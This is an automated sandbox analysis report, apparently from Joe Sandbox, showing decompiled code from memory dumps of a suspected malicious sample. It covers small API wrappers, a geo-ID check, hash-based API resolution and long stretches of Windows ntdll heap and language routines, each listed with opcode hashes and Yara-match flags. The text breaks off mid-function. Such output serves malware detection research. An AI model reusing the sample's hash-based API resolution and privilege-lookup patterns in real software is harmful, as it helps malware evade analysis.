					if(_t15 == 0) {
						return  *_t27(_t25, 0x8003, _t28 + (E0040C593(1, 8, _t19 + 0x50) & 0x000000ff) - 0x40, _t15);
					}
				}
				return _t15;
			}











                                                                              0x00409853
                                                                              0x00409864
                                                                              0x00409868
                                                                              0x00409873
                                                                              0x00409878
                                                                              0x00409883
                                                                              0x0040989b
                                                                              0x004098a0
                                                                              0x004098a7
                                                                              0x004098a9
                                                                              0x004098b6
                                                                              0x004098ba
                                                                              0x00000000
                                                                              0x004098db
                                                                              0x004098ba
                                                                              0x004098e3

                                                                              APIs
                                                                              • PostThreadMessageW.USER32(00009C09,00000111,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004098B6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_400000_SC_0017384.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID:
                                                                              • API String ID: 1836367815-0
                                                                              • Opcode ID: e365efcbe9aa574cabbbe28fad0c48d89a54f6196490ee781acc397b6ac2b83d
                                                                              • Instruction ID: 25d6e993d91f2ef34fdbd51d54c4a3584ce01c383ea0d7f898fb894523d5d79b
                                                                              • Opcode Fuzzy Hash: e365efcbe9aa574cabbbe28fad0c48d89a54f6196490ee781acc397b6ac2b83d
                                                                              • Instruction Fuzzy Hash: 3501FE72A4021877E71066919C83FFF376C9F40B44F544129FB047A2C2D6E8AD0643F9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041E853 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 321 41e853-41e884 call 41f1a3 RtlFreeHeap
                                                                              C-Code - Quality: 100%
                                                                              			E0041E853(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
				char _t10;

				_t3 = _a4 + 0xaa0; // 0xaa0
				E0041F1A3( *((intOrPtr*)(_a4 + 0x14)), _t7, _t3,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x35);
				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                              0x0041e862
                                                                              0x0041e86a
                                                                              0x0041e880
                                                                              0x0041e884

                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000060,63CD32E9,00004C56,00004C56,63CD32E9,00000060,00000000,00000000,?,?,?,?,00000000), ref: 0041E880
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_400000_SC_0017384.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: c8a672b8a58967bc736200cc46c129e915383bf5e10bf4aeab98ed5a2e8e69a7
                                                                              • Instruction ID: 061864bc1c04e48f0c44da88f6a003fae0e819f7d47d41956cf74d04cd78825c
                                                                              • Opcode Fuzzy Hash: c8a672b8a58967bc736200cc46c129e915383bf5e10bf4aeab98ed5a2e8e69a7
                                                                              • Instruction Fuzzy Hash: DFE012B1200208ABDB14EF89DC49EA737ACAF88754F018159BA095B282C670E914CAB1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041E813 Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 318 41e813-41e844 call 41f1a3 RtlAllocateHeap
                                                                              C-Code - Quality: 100%
                                                                              			E0041E813(intOrPtr _a4, void* _a8, long _a12, long _a16) {
				void* _t10;

				E0041F1A3( *((intOrPtr*)(_a4 + 0x14)), _a4, _t7 + 0xa9c,  *((intOrPtr*)(_a4 + 0x14)), 0, 0x34);
				_t10 = RtlAllocateHeap(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                              0x0041e82a
                                                                              0x0041e840
                                                                              0x0041e844

                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00418BF6,?,00419390,00419390,?,00418BF6,?,?,?,?,?,00000000,63CD32E9,B48117DD), ref: 0041E840
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_400000_SC_0017384.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 9df477bc8ebba14775362919c3eac36b710af54e88fe1e98d36794729293162a
                                                                              • Instruction ID: f2058bd6bc749991d4368c8bf30a122c18bef3a6f25dbbe48d49dd61b76beb85
                                                                              • Opcode Fuzzy Hash: 9df477bc8ebba14775362919c3eac36b710af54e88fe1e98d36794729293162a
                                                                              • Instruction Fuzzy Hash: 2EE012B2210208ABDB14EF89DC45EA737ACAF88664F018159BA085B242C670F9148AB1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00410023 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 313 410023-410047 call 419533 316 410049-41004a 313->316 317 41004b-41005c GetUserGeoID 313->317
                                                                              C-Code - Quality: 37%
                                                                              			E00410023(intOrPtr _a4) {
				intOrPtr* _t7;
				void* _t8;

				_t7 = E00419533(_a4 + 0x20,  *((intOrPtr*)(_a4 + 0x9cc)), 0, 0, 0x998e91b2);
				if(_t7 != 0) {
					_t8 =  *_t7(0x10); // executed
					return 0 | _t8 == 0x000000f1;
				} else {
					return _t7;
				}
			}





                                                                              0x0041003d
                                                                              0x00410047
                                                                              0x0041004d
                                                                              0x0041005c
                                                                              0x0041004a
                                                                              0x0041004a
                                                                              0x0041004a

                                                                              APIs
                                                                              • GetUserGeoID.KERNELBASE(00000010), ref: 0041004D
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_400000_SC_0017384.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: User
                                                                              • String ID:
                                                                              • API String ID: 765557111-0
                                                                              • Opcode ID: 8db12a4c292c9c454df692e40dc31025b76cec024ff7aae76387fcd38685c7b4
                                                                              • Instruction ID: 939452ee5edf35632b827bf5f9eda25a6d034f2bbfe47a43b57e9c42b48ff5ef
                                                                              • Opcode Fuzzy Hash: 8db12a4c292c9c454df692e40dc31025b76cec024ff7aae76387fcd38685c7b4
                                                                              • Instruction Fuzzy Hash: 0FE0C27368030426FB2091A59C42FB6374E5B84B00F448475F90CE63C2D4A8E9C00018
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041E9B3 Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                              Download Yara Rule

                                                                              Control-flow Graph

                                                                              • Executed
                                                                              • Not Executed
                                                                              control_flow_graph 324 41e9b3-41e9e4 call 41f1a3 LookupPrivilegeValueW
                                                                              C-Code - Quality: 100%
                                                                              			E0041E9B3(intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
				int _t10;

				E0041F1A3( *((intOrPtr*)(_a4 + 0x48)), _a4, _t7 + 0xab8,  *((intOrPtr*)(_a4 + 0x48)), 0, 0x46);
				_t10 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
				return _t10;
			}




                                                                              0x0041e9ca
                                                                              0x0041e9e0
                                                                              0x0041e9e4

                                                                              APIs
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,?,0040FE75,0040FE75,?,00000000,?,?), ref: 0041E9E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.430398181.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_400000_SC_0017384.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LookupPrivilegeValue
                                                                              • String ID:
                                                                              • API String ID: 3899507212-0
                                                                              • Opcode ID: eeae0e6bfdf9e8d0bf924b8cb613bfa05dc75d8c1ff94289364aca53589ed468
                                                                              • Instruction ID: c5246babae4b55bf1b645f7516bfde8bdc09840f3310adf15b3fa9c840887a8c
                                                                              • Opcode Fuzzy Hash: eeae0e6bfdf9e8d0bf924b8cb613bfa05dc75d8c1ff94289364aca53589ed468
                                                                              • Instruction Fuzzy Hash: 1FE012B1600208ABDB20EF89CC81EEB37ADAF88654F018159BA085B242D675E854CAB5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017A967A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 13e32d79c821461ea556fb4f08dca71d8d58ee133448aea44063e8506232a8ae
                                                                              • Instruction ID: ec7df66e3dee724d35016613aad4ecdd39e7863daa7158fee0ac70295e99e065
                                                                              • Opcode Fuzzy Hash: 13e32d79c821461ea556fb4f08dca71d8d58ee133448aea44063e8506232a8ae
                                                                              • Instruction Fuzzy Hash: 6DB09B719054D5CAD651D7A44608717F900BBD4745F56C171D2020641B8778D091F5B5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              Function 0181B260 Relevance: 37.8, Strings: 30, Instructions: 262COMMONLIBRARYCODE
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • read from, xrefs: 0181B4AD, 0181B4B2
                                                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0181B53F
                                                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0181B476
                                                                              • The resource is owned exclusively by thread %p, xrefs: 0181B374
                                                                              • write to, xrefs: 0181B4A6
                                                                              • *** An Access Violation occurred in %ws:%s, xrefs: 0181B48F
                                                                              • The critical section is owned by thread %p., xrefs: 0181B3B9
                                                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0181B305
                                                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 0181B352
                                                                              • The instruction at %p tried to %s , xrefs: 0181B4B6
                                                                              • a NULL pointer, xrefs: 0181B4E0
                                                                              • The resource is owned shared by %d threads, xrefs: 0181B37E
                                                                              • an invalid address, %p, xrefs: 0181B4CF
                                                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0181B323
                                                                              • This failed because of error %Ix., xrefs: 0181B446
                                                                              • *** enter .exr %p for the exception record, xrefs: 0181B4F1
                                                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0181B47D
                                                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0181B484
                                                                              • <unknown>, xrefs: 0181B27E, 0181B2D1, 0181B350, 0181B399, 0181B417, 0181B48E
                                                                              • *** Inpage error in %ws:%s, xrefs: 0181B418
                                                                              • *** then kb to get the faulting stack, xrefs: 0181B51C
                                                                              • The instruction at %p referenced memory at %p., xrefs: 0181B432
                                                                              • *** enter .cxr %p for the context, xrefs: 0181B50D
                                                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0181B39B
                                                                              • Go determine why that thread has not released the critical section., xrefs: 0181B3C5
                                                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0181B2DC
                                                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0181B38F
                                                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0181B314
                                                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0181B2F3
                                                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0181B3D6
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                              • API String ID: 0-108210295
                                                                              • Opcode ID: c6cc5ce7645a88988f95da48aea2384d721d56276d068193cb0fd803248e17c8
                                                                              • Instruction ID: 2d834d07fecc4e07be30079fc046d726a622238eda987bdc3532321669973165
                                                                              • Opcode Fuzzy Hash: c6cc5ce7645a88988f95da48aea2384d721d56276d068193cb0fd803248e17c8
                                                                              • Instruction Fuzzy Hash: 60812972A40200FFDB316B4ACC99D6BBF39EF56755F40404CFA049B21AD2B59651CBB2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01821C06 Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 44%
                                                                              			E01821C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x17448a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0176B150();
				} else {
					E0176B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x185589c);
				E0176B150("Heap error detected at %p (heap handle %p)\n",  *0x18558a0);
				_t27 =  *0x1855898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01821E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0176B150();
				} else {
					E0176B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0176B150("Error code: %d - %s\n",  *0x1855898);
				_t113 =  *0x18558a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0176B150();
					} else {
						E0176B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0176B150("Parameter1: %p\n",  *0x18558a4);
				}
				_t115 =  *0x18558a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0176B150();
					} else {
						E0176B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0176B150("Parameter2: %p\n",  *0x18558a8);
				}
				_t117 =  *0x18558ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0176B150();
					} else {
						E0176B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0176B150("Parameter3: %p\n",  *0x18558ac);
				}
				_t119 =  *0x18558b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0176B150();
					} else {
						E0176B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x18558b4);
					E0176B150("Last known valid blocks: before - %p, after - %p\n",  *0x18558b0);
				} else {
					_t120 =  *0x18558b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0176B150();
				} else {
					E0176B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0176B150("Stack trace available at %p\n", 0x18558c0);
			}











                                                                              0x01821c10
                                                                              0x01821c16
                                                                              0x01821c1e
                                                                              0x01821c3d
                                                                              0x01821c3e
                                                                              0x01821c20
                                                                              0x01821c35
                                                                              0x01821c3a
                                                                              0x01821c44
                                                                              0x01821c55
                                                                              0x01821c5a
                                                                              0x01821c65
                                                                              0x01821c67
                                                                              0x00000000
                                                                              0x01821c6e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01821c67
                                                                              0x01821cdc
                                                                              0x01821ce5
                                                                              0x01821d04
                                                                              0x01821d05
                                                                              0x01821ce7
                                                                              0x01821cfc
                                                                              0x01821d01
                                                                              0x01821d0b
                                                                              0x01821d17
                                                                              0x01821d1f
                                                                              0x01821d25
                                                                              0x01821d30
                                                                              0x01821d4f
                                                                              0x01821d50
                                                                              0x01821d32
                                                                              0x01821d47
                                                                              0x01821d4c
                                                                              0x01821d61
                                                                              0x01821d67
                                                                              0x01821d68
                                                                              0x01821d6e
                                                                              0x01821d79
                                                                              0x01821d98
                                                                              0x01821d99
                                                                              0x01821d7b
                                                                              0x01821d90
                                                                              0x01821d95
                                                                              0x01821daa
                                                                              0x01821db0
                                                                              0x01821db1
                                                                              0x01821db7
                                                                              0x01821dc2
                                                                              0x01821de1
                                                                              0x01821de2
                                                                              0x01821dc4
                                                                              0x01821dd9
                                                                              0x01821dde
                                                                              0x01821df3
                                                                              0x01821df9
                                                                              0x01821dfa
                                                                              0x01821e00
                                                                              0x01821e0a
                                                                              0x01821e13
                                                                              0x01821e32
                                                                              0x01821e33
                                                                              0x01821e15
                                                                              0x01821e2a
                                                                              0x01821e2f
                                                                              0x01821e39
                                                                              0x01821e4a
                                                                              0x01821e02
                                                                              0x01821e02
                                                                              0x01821e08
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x01821e08
                                                                              0x01821e5b
                                                                              0x01821e7a
                                                                              0x01821e7b
                                                                              0x01821e5d
                                                                              0x01821e72
                                                                              0x01821e77
                                                                              0x01821e95

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.432025851.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_1740000_SC_0017384.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                              • API String ID: 0-2897834094
                                                                              • Opcode ID: 80ca54aab132aa248f0d8865667e673cf3ff251e605057e5f7fb99f44a3860ee
                                                                              • Instruction ID: a7c73833c2b3bedc7cc0294905d09e08abb52a5dc1192825c556614225a41433
                                                                              • Opcode Fuzzy Hash: 80ca54aab132aa248f0d8865667e673cf3ff251e605057e5f7fb99f44a3860ee
                                                                              • Instruction Fuzzy Hash: 1161D677615159EFD366AB49D88CD21F3A8EB05B38729807AFD09DB300DA749B808F19
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01773D34 Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 96%
                                                                              			E01773D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01771B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01771B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01771B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01771B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01771B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01784620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E017AF3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E017B1370(_t276, 0x1744e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E017ABB40(0,  &_v68, _t170);
									if(L017743C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E017ABB40(_t257,  &_v68, _t243);
								if(L017743C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E017B1370(_t278, 0x1744e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01784620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E017AF3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E017B1370(_v16, 0x1744e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E017ABB40(_t262,  &_v68, _t244);
								if(L017743C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E017B1370(_t282, 0x1744e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E017ABB40(_t262,  &_v68, _t201);
							if(L017743C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v16);
							_v28 = _t280;
							_v16 = _t280;
						}
						_t202 = _v8;
						if(_v8 != 0) {
							L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t202);
						}
						_v8 = _t280;
						goto L28;
					}
				}
				_t214 = _v12;
				_t264 = _v12 + 4;
				_v40 = _t264;
				if(_t264 == 0) {
					_v20 = _t280;
				} else {
					_t236 = L01784620(_t264,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t264);
					_t280 = _t236;
					_v20 = _t236;
					_t214 = _v12;
				}
				if(_t280 == 0) {
					_t161 = 0;
					_t280 = 0xc0000017;
					_v40 = 0;
					goto L48;
				} else {
					E017AF3E0(_t280, _v8, _t214);
					_t285 = _t285 + 0xc;
					_v48 = _t280;
					_t283 = E017B1370(_t280, 0x1744e90);
					_pop(_t267);
					if(_t283 != 0) {
						_t245 = _v48;
						do {
							 *_t283 = 0;
							_t284 = _t283 + 2;
							E017ABB40(_t267,  &_v68, _t245);
							if(L017743C0( &_v68,  &_v24) != 0) {
								_t275 = _t275 + 1;
							}
							_t245 = _t284;
							_t283 = E017B1370(_t284, 0x1744e90);
							_pop(_t267);
						} while (_t283 != 0);
						_v48 = _t245;
						_t242 = _v52;
					}
					_t224 = _v48;
